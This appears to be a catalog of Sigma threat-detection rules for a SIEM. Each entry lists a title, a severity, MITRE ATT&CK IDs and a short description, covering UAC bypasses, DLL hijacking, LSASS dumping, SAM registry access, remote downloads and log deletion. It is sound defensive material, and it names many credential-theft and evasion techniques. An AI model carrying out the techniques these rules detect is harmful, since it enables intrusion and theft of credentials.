Detects default PsExec service filename which indicates PsExec service installation and execution
T1566T1566.001T1574T1574.001
imFileEvent
Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious mo
Rclone Activity via Proxy
sigma medium
T1567.002
imWebSession
Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string
WMIC Loading Scripting Libraries
sigma medium
T1220
DeviceImageLoadEvents
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). It could be a
T1012
imRegistry
This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the s
Azure AD Health Service Agents Registry Keys Access
sigma medium
T1012
imRegistry
This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health servi
Disabling Security Tools
sigma medium
T1562.004
imProcessCreate
Detects disabling security tools
NetNTLM Downgrade Attack
sigma high
T1562.001T1112
imRegistry
Detects NetNTLM downgrade attack
PCRE.NET Package Image Load
sigma high
T1059
DeviceImageLoadEvents
Detects processes loading modules related to PCRE.NET package
PCRE.NET Package Temp Files
sigma high
T1059
imFileEvent
Detects processes creating temp files related to PCRE.NET package
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Consent and Comctl32 - File
sigma high
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
UAC Bypass Using IEInstal - File
sigma high
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
UAC Bypass Using .NET Code Profiler on MMC
sigma high
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
UAC Bypass Using NTFS Reparse Point - File
sigma high
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
UAC Bypass Using Windows Media Player - File
sigma high
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Wmiprvse Wbemcomn DLL Hijack
sigma high
T1047T1021.002
DeviceImageLoadEvents
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
Connection Proxy
sigma low
T1090
imProcessCreate
Detects setting proxy configuration
OMIGOD SCX RunAsProvider ExecuteScript
sigma high
T1068T1190T1203
imProcessCreate
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* pre
OMIGOD SCX RunAsProvider ExecuteShellCommand
sigma high
T1068T1190T1203
imProcessCreate
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Ag
Setuid and Setgid
sigma low
T1548.001
imProcessCreate
Detects suspicious change of file privileges with chown and chmod commands
Source Code Enumeration Detection by Keyword
sigma medium
T1083
imWebSession
Detects source code enumeration that use GET requests by keyword searches in URL strings
Suspicious File Drop by Exchange
sigma medium
T1190T1505.003
imFileEvent
Detects suspicious file type dropped by an Exchange component in IIS
Suspicious ASPX File Drop by Exchange
sigma high
T1505.003
imFileEvent
Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
Unusual File Modification by dns.exe
sigma high
T1133
imFileEvent
Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
T1528
imRegistry
Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
Clear Linux Logs
sigma medium
T1070.002
imProcessCreate
Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
Clipboard Collection with Xclip Tool
sigma low
T1115
imProcessCreate
Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard ut
Curl Usage on Linux
sigma low
T1105
imProcessCreate
Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
Disable Or Stop Services
sigma medium
imProcessCreate
Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
File Deletion
sigma low
T1070.004
imProcessCreate
Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
History File Deletion
sigma high
T1565.001
imProcessCreate
Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
Linux Base64 Encoded Shebang In CLI
sigma medium
T1140
imProcessCreate
Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
Print History File Contents
sigma medium
T1592.004
imProcessCreate
Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
Remove Immutable File Attribute
sigma medium
T1222.002
imProcessCreate
Detects usage of the 'chattr' utility to remove immutable file attribute.
Remove Scheduled Cron Task/Job
sigma medium
imProcessCreate
Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack th
Suspicious Curl Change User Agents - Linux
sigma medium
T1071.001
imProcessCreate
Detects a suspicious curl process start on linux with set useragent options
System Network Discovery - Linux
sigma low
T1016
imProcessCreate
Detects enumeration of local network configuration
Bitsadmin to Uncommon IP Server Address
sigma high
T1071.001T1197
imWebSession
Detects Bitsadmin connections to IP addresses instead of FQDN names
Legitimate Application Dropped Archive
sigma high
T1218
imFileEvent
Detects programs on a Windows system that should not write an archive to disk
Third Party Software DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
Suspicious Interactive PowerShell as SYSTEM
sigma high
T1059.001
imFileEvent
Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
Writing Local Admin Share
sigma medium
T1546.002
imFileEvent
Aversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.
T1574.001
imFileEvent
Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is
Flash Player Update from Suspicious Location
sigma high
T1189T1204.002T1036.005
imWebSession
Detects a flashplayer update from an unofficial location
T1574.001
imFileEvent
Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Sea
ISO File Created Within Temp Folders
sigma high
T1566.001
imFileEvent
Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
Drop Binaries Into Spool Drivers Color Folder
sigma medium
imFileEvent
Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
Linux Shell Pipe to Shell
sigma medium
T1140
imProcessCreate
Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
UAC Bypass Using Iscsicpl - ImageLoad
sigma high
T1548.002
DeviceImageLoadEvents
Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
UEFI Persistence Via Wpbbin - FileCreation
sigma high
T1542.001
imFileEvent
Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
NTDS.DIT Creation By Uncommon Process
sigma high
T1003.002T1003.003
imFileEvent
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
RDP to HTTP or HTTPS Target Ports
sigma high
T1572T1021.001
imNetworkSession
Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
AD Privileged Users or Groups Reconnaissance
sigma high
T1087.002
imRegistry
Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs
DD File Overwrite
sigma low
T1485
imProcessCreate
Detects potential overwriting and deletion of a file using DD.
Hack Tool User Agent
sigma high
T1190T1110
imWebSession
Detects suspicious user agent strings user by hack tools in proxy logs
Install Root Certificate
sigma low
T1553.004
imProcessCreate
Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
Scheduled Task/Job At
sigma low
T1053.002
imProcessCreate
Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execu
Triple Cross eBPF Rootkit Execve Hijack
sigma high
imProcessCreate
Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
Triple Cross eBPF Rootkit Install Commands
sigma high
T1014
imProcessCreate
Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
UAC Bypass Using IDiagnostic Profile - File
sigma high
T1548.002
imFileEvent
Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
WerFault LSASS Process Memory Dump
sigma high
T1003.001
imFileEvent
Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
Linux Recon Indicators
sigma high
T1592.004T1552.001
imProcessCreate
Detects events with patterns found in commands used for reconnaissance on linux systems
Cross Site Scripting Strings
sigma high
T1189
imWebSession
Detects XSS attempts injected via GET requests in access logs
Server Side Template Injection Strings
sigma high
T1221
imWebSession
Detects SSTI attempts sent via GET requests in access logs
Creation of a Diagcab
sigma medium
imFileEvent
Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
Nohup Execution
sigma medium
T1059.004
imProcessCreate
Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
Chmod Suspicious Directory
sigma medium
T1222.002
imProcessCreate
Detects chmod targeting files in abnormal directory paths.
Suspicious Java Children Processes
sigma high
T1059
imProcessCreate
Detects java process spawning suspicious children
Created Files by Microsoft Sync Center
sigma medium
T1055T1218
imFileEvent
This rule detects suspicious files created by Microsoft Sync Center (mobsync)
Fax Service DLL Search Order Hijack
sigma high
T1574.001
DeviceImageLoadEvents
The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
Suspicious Desktopimgdownldr Target File
sigma high
T1105
imFileEvent
Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
Suspicious Files in Default GPO Folder
sigma medium
T1036.005
imFileEvent
Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
Suspicious Get-Variable.exe Creation
sigma high
T1546T1027
imFileEvent
Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks
Suspicious Dropbox API Usage
sigma high
T1105T1567.002
imNetworkSession
Detects an executable that isn't dropbox but communicates with the Dropbox API
Interactive Bash Suspicious Children
sigma medium
T1059.004T1036
imProcessCreate
Detects suspicious interactive bash as a parent to rather uncommon child processes
T1190T1505.003
imFileEvent
Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
GoToAssist Temporary Installation Artefact
sigma medium
T1219.002
imFileEvent
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
ScreenConnect Temporary Installation Artefact
sigma medium
T1219.002
imFileEvent
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
BPFtrace Unsafe Option Usage
sigma medium
T1059.004
imProcessCreate
Detects the usage of the unsafe bpftrace option
ISO or Image Mount Indicator in Recent Files
sigma medium
T1566.001
imFileEvent
Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users
TeamViewer Remote Session
sigma medium
T1219.002
imFileEvent
Detects the creation of log files during a TeamViewer remote session
Installation of TeamViewer Desktop
sigma medium
T1219.002
imFileEvent
TeamViewer_Desktop.exe is create during install
Office Macro File Creation
sigma low
T1566.001
imFileEvent
Detects the creation of a new office macro files on the systems
Linux Doas Tool Execution
sigma low
T1548
imProcessCreate
Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
Shell Open Registry Keys Manipulation
sigma high
T1548.002T1546.001
imRegistry
Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 3
T1053
imFileEvent
Detects the creation of tasks from processes executed from suspicious locations
Creation Exe for Service with Unquoted Path
sigma high
T1547.009
imFileEvent
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in
Suspicious Creation TXT File in User Desktop
sigma high
T1486
imFileEvent
Ransomware create txt file in the user Desktop
Crypto Miner User Agent
sigma high
T1071.001
imWebSession
Detects suspicious user agent strings used by crypto miners in proxy logs
Decode Base64 Encoded Text
sigma low
T1027
imProcessCreate
Detects usage of base64 utility to decode arbitrary base64-encoded text
Hijack Legit RDP Session to Move Laterally
sigma high
T1219.002
imFileEvent
Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
HTTP Request With Empty User Agent
sigma medium
T1071.001
imWebSession
Detects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.
Linux Remote System Discovery
sigma low
T1018
imProcessCreate
Detects the enumeration of other remote systems.
Octopus Scanner Malware
sigma high
T1195T1195.001
imFileEvent
Detects Octopus Scanner Malware.
Processes Accessing the Microphone and Webcam
sigma medium
T1123
imRegistry
Potential adversaries accessing the microphone and webcam in an endpoint.
PwnDrp Access
sigma critical
T1071.001T1102.001T1102.003
imWebSession
Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
SAM Registry Hive Handle Request
sigma high
T1012T1552.002
imRegistry
Detects handles requested to SAM registry hive
SysKey Registry Keys Access
sigma high
T1012
imRegistry
Detects handle requests and access operations to specific registry keys to calculate the SysKey
Windows PowerShell User Agent
sigma medium
T1071.001
imWebSession
Detects Windows PowerShell Web Access
Windows WebDAV User Agent
sigma high
T1071.001
imWebSession
Detects WebDav DownloadCradle
T1546.003
DeviceImageLoadEvents
Detects WMI command line event consumers
T1546.003
imFileEvent
Detects file writes of WMI script event consumer
Linux Crypto Mining Pool Connections
sigma high
T1496
imNetworkSession
Detects process connections to a Monero crypto mining pool
System Information Discovery
sigma low
T1082
imProcessCreate
Detects system information discovery commands
Detection of Virtual Appliances through the use of WMI for use of evasion.
Rule to detect DarkEYEv3 encrypted executables (often malware)